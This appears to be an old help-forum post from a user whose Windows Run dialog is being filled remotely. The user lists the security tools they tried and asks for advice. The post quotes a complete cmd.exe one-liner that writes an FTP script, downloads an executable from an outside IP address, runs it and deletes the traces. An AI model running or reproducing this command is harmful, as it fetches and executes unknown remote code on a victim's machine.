Run window being auto populated by someone/thing else
Posted on 2006-11-05
I have a question : at random intervals the run window from start>Run pops up and starts populating with text that tries to do something
This is the command line :
cmd.exe /c del i&echo open 220.127.116.11 7085 > i&echo user 1 1 >> i &echo get 112.exe >> i &echo quit >> i &ftp -n -s:i &112.exe&del i&exit
I downloaded these programs against rootkit : Sophos anti rootkit, rootkit revealer and Novatix cyberhawk.
Sophos scan didnt find out anything, so did cyberhawk. I dont understand the rootkit revealer log.
I do use VNC viewer 4.1
I also have spyware doctor, spyware blaster, registry mechanic and AVG AV with firewall.
Help would be very appreciated